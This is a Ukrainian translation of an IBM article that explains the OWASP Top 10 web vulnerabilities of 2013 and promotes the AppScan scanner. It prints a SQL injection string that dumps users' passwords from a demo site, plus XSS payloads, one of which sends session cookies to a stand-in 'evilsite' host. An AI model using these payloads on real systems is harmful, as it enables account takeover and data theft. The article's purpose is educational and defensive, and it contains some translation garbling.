Донецкий техникум промышленной автоматики

Перевірте ваші програми на уразливості зі списку OWASP Top 10 за 2013 рік.

  1. Ознайомча версія AppScan Standard IBM Security AppScan - це передовий пакет інструментів, призначений...
  2. Поганий код - основна причина більшості проломів в Web-додатках
  3. Список OWASP Top 10 - найкраща практика захисту Web-додатків
  4. Список OWASP Top 10 за 2013 рік
  5. 1. Впровадження коду
  6. Приклад простий атаки з впровадженням SQL-коду
  7. Малюнок 1. Web-додаток, що повертає дані після відправки запиту
  8. 2. Некоректна аутентифікація і управління сеансами
  9. Несанкціоноване використання сеансу
  10. Малюнок 2. Приклад сценарію для отримання ідентифікатора сеансу, що зберігається в cookie-файлі
  11. 3. Міжсайтовий скриптинг
  12. Приклад XSS-атаки
  13. Малюнок 3. Приклад коментаря, що впроваджує XSS-сценарій в Web-сторінку
  14. 4. Небезпечні прямі посилання на об'єкти
  15. 5. Небезпечна конфігурація
  16. Малюнок 4. Повідомлення про помилки розкривають хакерам все секрети
  17. 6. Витік вразливих даних
  18. 7. Відсутність контролю доступу до функціонального уровня
  19. 8. Підробка міжсайтових запитів (CSRF)
  20. 9. Використання компонентів з відомими уразливими
  21. 10. Неперевірені перенаправлення і переходи
  22. Як уникнути зайвих витрат при мінімізації вразливостей в Web-додатку
  23. навчання розробників
  24. Гарантія захищеності Web-додатків
  25. Висновок
  26. Ресурси для скачування
Ознайомча версія AppScan Standard

Ознайомча версія AppScan Standard

IBM Security AppScan - це передовий пакет інструментів, призначений для перевірки додатків на захищеність і допомагає керувати процесом виявлення вразливостей протягом усього життєвого циклу розробки ПЗ. IBM Security AppScan автоматизує оцінку ступеня уразливості додатків, а також сканує і перевіряє їх на наявність відомих вразливостей, притаманних Web-додатків, включаючи впровадження SQL-коду, міжсайтовий скриптинг, переповнення буфера і сканування вразливостей в flash / flex-додатках і сервісах Web 2.0.

AppScan повністю охоплює всі уразливості зі списку OWASP Top 10 за 2013 рік. Крім того, наше рішення підтримує протокол Transport Layer Security (TLS) версії 1.2 і сумісно зі стандартами Federal Information Publication Standard (FIPS) 140-2 і National Institute of Standards and Technology (NIST) Special Publication (SP) 800-131a.

завантажте ознайомчу версію AppScan Standard .

За останнє десятиліття Web-сайти (Web-додатки) пройшли шлях від статичних сторінок до динамічних інтерактивних порталів з широкою функціональністю і складними системами управління інформацією. Сьогодні Web-додатки не тільки є гідними конкурентами багатьом додаткам для настільних ПК, а й продовжують розширювати межі використання завдяки перевагам безмежних хмарних сервісів. Практично кожне настільний офісний додаток має аналог, який працює через Web-браузер. Користувачі можуть з легкістю створювати, редагувати і поширювати інформацію через Web-браузери незалежно від матеріального становища і використовуваних пристроїв, позбавляючись від кайданів офісу і настільних ПК.

Бізнес також посприяв бурхливому розвитку Web-додатків. Крім того, що Web-додатки надають нові комерційні можливості, розробляти їх набагато дешевше і швидше, ніж звичайні настільні додатки. Web-додатки простіше і в розгортанні: все, що потрібно для їх використання - це мати сумісний Web-браузер. Будь-які вимоги до операційної системи (Windows®, Mac, Linux® і т. Д.) І апаратного забезпечення (наприклад, наявність вільного дискового простору) залишилися в минулому.

Обсяги інформації, з якими працюють Web-додатки, великі як ніколи. Працюємо ми з банківської онлайн-системою або записувалися на прийом до лікаря, ми щодня довіряємо Web-додатків безпечно обробляти мільярди записів, в тому числі наші конфіденційні і персональні дані.

Але чим потужніший і функціональніша Web-додаток, тим складніше його код, написаний розробниками. А чим складніше код, тим більше він схильний до потенційним вразливостей. У підсумку це може призвести до серйозних прогалин у безпеки. Уразливості Web-додатків невпинно вивчаються зловмисниками, метою яких може бути, наприклад, нажива на крадіжці важливої ​​інформації або набуття мережевий популярності шляхом злому будь-якої програми. З урахуванням цих загроз, а також того, що інформація в наш час може бути потужним знаряддям, неприпустимо ставитися до захисту Web-додатків абияк.

Захист Web-додатків

Як тільки Web-додаток стає доступним в мережі, воно стає мішенню для кібератак. Незалежно від того, чи здійснюється атака цілеспрямовано зловмисниками або є результатом роботи автоматизованого шкідливого ПО, виходите з того, що будь-який Web-додаток буде постійно перевірятися на міцність з усіх боків. Отже, перш ніж починати використовувати Web-додаток, необхідно забезпечити його захист.

Захист мережевого рівня (хостингу) Web-додатків є второваною доріжкою і являє собою ряд нескладних дій, які необхідно виконати. Однак мережевий екран не забезпечує захисту самих Web-додатків. Ахіллесовою п'ятою в захисті онлайнової інформації є рівень додатків. Уразливості додатків, що виникли внаслідок помилок в коді і використання слабких прийомів програмування, постійно експлуатуються хакерами і послужили причиною ряду найбільших витоків даних, що відбулися в недавньому минулому. У березні 2008 року була викрадена інформація про 134 мільйонів кредитних карт процессинговой компанії Heartland Payment Systems; причиною послужила уразливість Web-додатки, яку хакери використовували для впровадження SQL-коду і установки шкідливого ПО. У 2012 році компанія Yahoo! кілька разів постраждала від витоків даних, причиною яких стало використання вразливостей в Web-додатках; в результаті впровадження SQL-коду і міжсайтового скриптинга були вкрадені паролі більш ніж від 450 тисяч облікових записів користувачів.

Нехтування питаннями захисту Web-додатків може дуже сильно позначитися на роботі компанії. Навіть просте спотворення сторінки Web-сайту може привести до несприятливого висвітлення в засобах масової інформації і вдарити по репутації, однак найчастіше атаки хакерів націлені на викрадення персональних даних, що є найбільш вигідним для зловмисників і при цьому завдає найбільшої шкоди потерпілій стороні. Витік даних про замовників зазвичай призводить до того, що в пресі з'являється маса негативних відгуків про компанію, після чого слідують судові санкції і санкції з боку влади, які можуть призвести до втрати мільйонів доларів і навіть до різкого падіння курсу акцій. У разі серйозної витоку даних ви отримуєте безліч прихованих витрат: судові розслідування, простої і гарячковий переписування коду Web-додатки. Все це має дуже високу ціну.

Поганий код - основна причина більшості проломів в Web-додатках

Основною причиною більшості проломів в Web-додатках є написаний розробниками програмний код. Розробники можуть допускати помилки при написанні коду або не усвідомлювати всю важливість використання прийомів безпечного програмування - все це призводить до появи вразливостей в додатках. Розглянемо для прикладу код, що видаляє з поля введення символи, які не повинні прийматися і оброблятися додатком. Це досить простий прийом програмування, але якщо про нього забути, то зловмисник може використовувати поле введення для виконання SQL-запиту, в результаті якого він зможе отримати всі дані про користувачів, включаючи їх імена, електронні адреси та навіть номери кредитних карт. Такі уразливості є джерелом легкої здобичі для кіберзлочинців, оскільки викрадену інформацію можна швидко продати на нелегальних онлайн-ринках. Всі Web-додатки необхідно перевіряти на наявність вразливостей прикладного рівня, а розробників необхідно навчати оцінювати ризики і писати безпечний код.

Список OWASP Top 10 - найкраща практика захисту Web-додатків

Проект Open Web Application Security Project (див. Розділ ресурси ) - це Open Source-співтовариство, сформований в 2001 році і займається розробкою безкоштовних посібників щодо захисту додатків. Спільнота OWASP веде постійно актуалізуються список OWASP Top 10, в якому перераховані найбільш небезпечні уразливості в системі безпеки Web-додатків. Список OWASP Top 10 є кращою практикою усунення вразливостей Web-додатків; на нього посилаються такі солідні організації і норми безпеки, як PCI DSS, FTC, MITRE, а також більшість організацій, що займаються тестуванням Web-додатків на предмет вразливостей.

Список OWASP Top 10 за 2013 рік

Список OWASP містить перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Цей список оновлюється кожні три роки і в останній раз був оновлений в 2013 році. Список не включає в себе всі можливі типи вразливостей, крім того, часто буває, що ту чи іншу уразливість можна віднести відразу до декількох категорій.

1. Впровадження коду

Впровадження коду завжди було однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займають верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самої сумнозвісної з них є впровадження SQL-коду, успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатки не відфільтровує Зауважте, що ви, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.

Приклад простий атаки з впровадженням SQL-коду

У наступному прикладі ми будемо використовувати Web-сайт, розроблений IBM спеціально для тестування Web-додатків на предмет вразливостей: http://demotestfire.com . Компанія Altoro Mutual є вигаданою, але продемонстрована атака є цілком реальною (див. малюнок 1 ).

Тестове Web-додаток дозволяє користувачам виводити списки транзакцій, здійснених за певний період часу. Значення, що вводиться в поле введення дати, не обробляється фільтрами, тому додаток вразливе для впровадження SQL-коду. Вводити наступне значення дозволяє виконати команду, яка повертає вміст бази даних, включаючи імена і паролі користувачів: 1/1/2010 union select userid, null, username + '' + password, null from users--.

Малюнок 1. Web-додаток, що повертає дані після відправки запиту

Перша частина значення, введеного в поле введення, є датою - це саме те, чого очікує додаток. Цей прийом гарантує, що додаток обробить дані, що містять дату, разом з частиною введеної команди. За датою слід оператор "union", що означає початок SQL-команди. По суті, він говорить "Ось вам очікувана дата, а ще ...". Методом проб і помилок зловмисник може обчислити назву таблиці, яка містить дані про облікові записи користувачів (вона називається users), і кількість полів в ній. Після цього атакуючий використовує цю інформацію для складання SQL-команди select, що повертає дані з таблиці users. Отримана інформація, що містить імена і паролі облікових записів користувачів, відображається на Web-сторінці в формі для виведення списку транзакцій.

Це найпростіший приклад впровадження SQL-коду. У реальному світі атаки цього типу набагато вишуканіше, а хакери використовують спеціалізовані інструменти, які допомагають автоматизувати атаки.

2. Некоректна аутентифікація і управління сеансами

Друга найбільш небезпечна уразливість в списку OWASP пов'язана з методами аутентифікації і захисту користувальницьких сеансів в Web-додатку. Існує безліч типів цієї уразливості, одним з яких є несанкціоноване використання сеансу.

Несанкціоноване використання сеансу

Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентифицироваться користувачем і скомпрометувати його обліковий запис. Якщо додаток недостатньо добре захищає ідентифікатори сеансів (наприклад, відображає ідентифікатори всередині URL-адреси замість використання cookie-файлів), то зловмиснику дуже просто отримати ідентифікатор сеансу, обдуривши користувача.

Навіть якщо Web-додаток зберігає ідентифікатори сеансів в cookie-файлах, зловмисник все одно може отримати потрібну інформацію з локальних файлів користувача, хитрістю змусивши його виконати замаскований сценарій. За допомогою простого сценарію можна витягти ідентифікатор сеансу, що зберігається в cookie-файлі на комп'ютері користувача; наприклад, можна отримати ідентифікатор сеансу за допомогою наступного сценарію, введеного в поле пошуку уразливого Web-додатки: <script> alert (document.cookie) </ script>.

Малюнок 2. Приклад сценарію для отримання ідентифікатора сеансу, що зберігається в cookie-файлі

Для поліпшення системи аутентифікації і управління сеансами в додатках можна використовувати сучасні платформи для розробки ПО, а також прийоми написання безпечного коду. Зокрема, можна застосовувати прив'язку вихідного IP-адреси до ідентифікатора користувача сеансу і обов'язкову повторну аутентифікацію при зміні важливих параметрів облікового запису (наприклад, пароля або адреси електронної пошти). Саме ці дії намагаються виконувати зловмисники відразу ж після злому Web-сеансу. У цих випадках такий простий прийом програмування, як повторна аутентифікація, знищує несанкціонований сеанс і знижує ризик.

Іншим простим прийомом програмування, який не можна залишати без уваги, є знищення сеансу після закінчення заданого часу простою. Наприклад, якщо користувач не працює з Web-сайтом протягом п'яти хвилин, додаток розриває сеанс, змушуючи користувача (або будь-якого зловмисника) виконувати повторну аутентифікацію для продовження роботи. Цей простий прийом також знижує ризик несанкціонованого використання сеансу; його використовують в більшості онлайнових банківських Web-додатків.

3. Міжсайтовий скриптинг

Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.

Приклад XSS-атаки

Web-додаток з такого прикладу дозволяє користувачам заходити на Web-сторінку і розміщувати відгуки на продукти компанії. Поле для введення коментаря схильне XSS-атак. Нижче показаний приклад коментаря (This is a great product <script> document.write ( '<img scr = http: //evilsite/'+document.cookie>'); </ script >>), що впроваджує в Web-сторінку XSS -сценарій, який намагається дізнатися ідентифікатор сеансу користувача.

Малюнок 3. Приклад коментаря, що впроваджує XSS-сценарій в Web-сторінку

Вразливе Web-додаток обробляє коментар разом з XSS-сценарієм. Починаючи з цього моменту користувачі, що зайшли на сторінку відгуків, бачать коментар "This is a great product", але не бачать сценарію, який тим не менш виконується в їх Web-браузерах і відправляє інформацію з cookie-файлів (включаючи ідентифікатор сеансу) на Web -сайт зловмисника. У цьому прикладі Web-сайт зловмисника називається "evilsite". Отримавши необхідний ідентифікатор сеансу, зловмисник компрометує обліковий запис жертви. Такі сценарії надзвичайно небезпечні, оскільки з їх допомогою хакери можуть викрадати за один прийом тисячі облікових записів.

У наші дні більшість сучасних браузерів містить захист від XSS-атак - наприклад, Internet Explorer за замовчуванням запускається в режимі захисту, що запобігає виконання XSS-сценаріїв. Проте XSS-атаки досі досить популярні і поширені, тому подібні уразливості ніколи не повинні бути присутніми в Web-додатках.

4. Небезпечні прямі посилання на об'єкти

Пролом, обумовлена ​​наявністю небезпечних прямих посилань на об'єкти, може привести до того, що авторизований користувач Web-додатки може отримати неавторизований доступ до привілейованих функцій і даних. Якщо в коді програми неграмотно або неправильно реалізовані методи роботи з інформаційними об'єктами (наприклад, з файлами, каталогами або ключами баз даних), то користувачі, що не володіють необхідними привілеями, можуть обійти засоби захисту, реалізовані в додатку. Використовуючи цю вразливість, користувачі можуть змінювати значення параметрів таким чином, щоб безпосередньо звертатися до об'єктів, доступ до яких їм заборонено.

Щоб захиститися від цього, розробники можуть впровадити засоби контролю доступу до всіх доступних користувачам об'єктів.

5. Небезпечна конфігурація

Небезпечна конфігурація може бути присутнім у всіх компонентах Web-додатки, включаючи платформу (операційну систему), Web-сервер, бази даних або інфраструктуру. Поширеними помилками є запущені без необхідності служби, облікові записи адміністратора з параметрами за замовчуванням, доступне для онлайн-перегляду вміст файлів і директорій. Однак улюбленою темою хакерів є небезпечна обробка повідомлень про помилки.

Малюнок 4. Повідомлення про помилки розкривають хакерам все секрети

Виведені додатком повідомлення про помилки, які були відключені, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати. В останньому прикладі повідомлення про помилку інформує зловмисника про те, що в результаті виконання шкідливого SQL-запиту було отримано вірне ім'я бази даних, але невірне кількість полів.

6. Витік вразливих даних

Web-додаток повинен правильно працювати з уразливими даними і захищати їх. Для запобігання витоку даних в процесі їх обробки, передачі і зберігання необхідно забезпечувати захист на всіх рівнях за допомогою надійних процедур контролю доступу, загальновизнаних криптоалгоритмів і методів управління ключами шифрування.

7. Відсутність контролю доступу до функціонального уровня

Користувачі, что Працюють з Web-додатком, могут мати Різні Рівні повноважень. У таких випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.

Якщо захист привілейованих функцій полягає лише в тому, що вони просто заховані в коді програми, то зловмисник, скомпрометував обліковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.

8. Підробка міжсайтових запитів (CSRF)

Підробка міжсайтових запитів (cross-site request forgery, CSRF) заснована на тому, що аутентифицированного користувача Web-додатки обманним шляхом змушують запустити шкідливий сценарій, який виконує дії від імені законного користувача. Наприклад, на комп'ютері користувача може таємно виконуватися CSRF-сценарій, що відправляє Web-додатком запит на зміну пароля, а після успішної авторизації користувача Web-додаток виконує цей запит.

Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або використання випадкових імен полів в різних формах Web-додатки, що робить неможливим створення зловмисником працюючого сценарію.

9. Використання компонентів з відомими уразливими

Будь-сторонній компонент Web-додатки - будь то двійковий або вихідний код, комерційне або Open Source-додаток - повинен перевірятися на відсутність вразливостей.

Практично кожне Web-додаток використовує Open Source-компоненти, наприклад, бібліотеку OpenSSL, що забезпечує TLS / SSH-шифрування Web-сайтів (HTTPS). У квітні 2014 року в декількох версіях цієї бібліотеки була виявлена ​​критична уразливість CVE-2014-0160, відома як Heartbleed.

Якщо ви хочете бути впевненими в тому, що сторонні компоненти Web-додатки не містять вразливостей, необхідно постійно стежити за виходом нових виправлень, що стосуються їх безпеки, а також за виходом нових версій програм для сканування вразливостей.

10. Неперевірені перенаправлення і переходи

Web-додатки часто перенаправляють користувачів на інші сторінки за допомогою певних параметрів. Якщо ці параметри не перевіряються, то зловмисник може обманним шляхом перенаправити користувача на шкідливу Web-сторінку, змусивши його розкрити свій пароль та інші важливі дані. Наприклад, зловмисник може створити повідомлення електронної пошти з фішинговою посиланням, що містить ім'я необхідного Web-сайту. При цьому відповідальний за перенаправлення параметр, що міститься в кінці URL-адреси, може бути не видно користувачеві, в результаті чого користувач з великою ймовірністю клацне за цим посиланням або скопіює її в Web-браузер, так як доменне ім'я в URL-адресі не викличе у нього ніяких підозр.

За додатковою інформацією про список OWASP Top 10 (2013) зверніться до розділу ресурси .

Як уникнути зайвих витрат при мінімізації вразливостей в Web-додатку

Розробка і випуск Web-додатків, що містять уразливості, можуть коштувати вам як грошей, так і часу, оскільки виправлення навіть одного рядка коду після того, як додаток запущено в експлуатацію, може обернутися сотнями годин роботи з переписування і повторному тестуванню коду. Пошук і усунення вразливостей в додатку найбільш ефективні і економічні на ранніх стадіях розробки.

Випробування сторонніх компонентів програми на проникнення допомагає переконатися в його безпеці, проте цей і всі пов'язані з ним процеси займають час і призводять до зайвих витрат. Уразливості повинні усуватися на більш ранніх стадіях розробки Web-додатки. Якщо в процесі розробки програми розробники допустили помилки в коді, то необхідно правильно навчити їх, щоб виключити появу подібних помилок в майбутньому. Звіт стандартної перевірки на проникнення містить дуже мало інформації, яка могла б виявитися корисною для розробників.

Передовий інструмент для пошуку вразливостей в Web-додатках - IBM Rational AppScan - дозволяє розробникам і тестувальникам Web-додатків зробити процес пошуку вразливостей частиною внутрішнього циклу розробки ПЗ, що включає в себе пошук всіх вразливостей зі списку OWASP Top 10 (див. Розділ ресурси ). AppScan - це потужний інструмент, який розробники можуть налаштовувати під свої потреби. А оскільки розробники знають про своїх додатках набагато більше будь-яких сторонніх виробників засобів випробувань на проникнення, AppScan дозволяє їм виконувати більш глибоке тестування Web-додатків.

навчання розробників

AppScan видає коротку інформацію про всі слабкі місця, які він виявляє в Web-додатках, включаючи детальну інформацію про метод тестування, в ході якого була виявлена ​​уразливість (таку інформацію нечасто можна зустріти в звітах випробувань на проникнення). AppScan виявляється особливо корисним тоді, коли необхідно пояснити причину виникнення уразливості розробникам і навчити їх правильно писати код за допомогою простих текстових і відеоматеріалів і навіть фрагментів коду, які вони можуть використовувати для усунення своїх помилок. Такі рівень підтримки розробників і обсяг наданої інформації не тільки допомагають розробником краще зрозуміти всю важливість захисту Web-додатків, але і вчать їх писати правильний код, знижуючи ймовірність появи вразливостей в Web-додатках в майбутньому.

Гарантія захищеності Web-додатків

У AppScan реалізовано широкі можливості створення стандартизованих звітів самих різних типів, які можна використовувати в якості гарантій і доказів того, що в процесі розробки Web-додаток було належним чином захищено. Звіт Delta Analysis служить підтвердженням того, що додаток містить всі виправлення, що закривають уразливості, а звіти на базі стандартів OWASP Top 10 і PCI DSS демонструють захищеність Web-додатків аудиторам і замовникам.

Висновок

Недооцінка важливості захисту Web-додатків - це міна з годинниковим механізмом. Одна-єдина вразливість в Web-додатку може привести до глобальної витоку даних, яка може зруйнувати вщент навіть найбільшу компанію, викликавши негативні відгуки в засобах масової інформації по всьому світу, серйозні фінансові санкції та втрату суспільної довіри. Сьогодні захист Web-додатків з використанням загальноприйнятих стандартів і методів, таких як OWASP Top 10, а також використання інструментів пошуку вразливостей, таких як IBM Rational AppScan, є необхідною практикою.

Ресурси для скачування

Схожі тими

  • Оригінал статті: Scan your app to find and fix OWASP Top 10 2013 vulnerabilities (EN).
  • У бібліотеці OpenSSL була виявлена ​​критична уразливість CVE-2014-0160 (EN), відома як Heartbleed.
  • Отримайте додаткову інформацію та вказівки по роботі з останнім списком OWASP Top 10 (EN).
  • Проект Open Web Application Security Project ( OWASP ) (EN) - це засноване в 2011 році Open Source-співтовариство, яке займається розробкою безкоштовних посібників щодо захисту додатків.
  • Використовуйте для тестування вразливостей демонстраційне Web-додаток від IBM http://demotestfire.com .
  • Підробка міжсайтових запитів (CSRF) (EN) може змусити кінцевого користувача виконувати небажані дії в Web-додатку, в якому він аутентифікований.
  • приєднуйтесь до спільноті Security On developerWorks (EN) і знайомтеся з керівництвами, статтями, відеофайлами та демонстраційними матеріалами, які можна знайти в бібліотеці спільноти.
  • Зустрітися з блогом Security On developerWorks (EN), в якому ви знайдете інформацію про різні посібниках, статтях і демонстраційних відеоматеріалах.
  • Підпишіться на щотижневий інформаційний бюлетень Security On developerWorks (EN), щоб бути в курсі останніх новин.
  • Слідкуйте за матеріалами блогу @dwsecurity (EN) в Твіттері отримуйте оновлення розділу Security порталу developerWorks в реальному часі.
  • Дізнайтеся более про IBM Rational AppScan (EN) - передовому інструменті для пошуку уразливості в Web-додатках.
  • Використовуйте у вашому наступному open source проект ознайомчі версії програмного забезпечення IBM (EN), які можна завантажити з сайту або замовити на DVD.

Підпішіть мене на ПОВІДОМЛЕННЯ до коментарів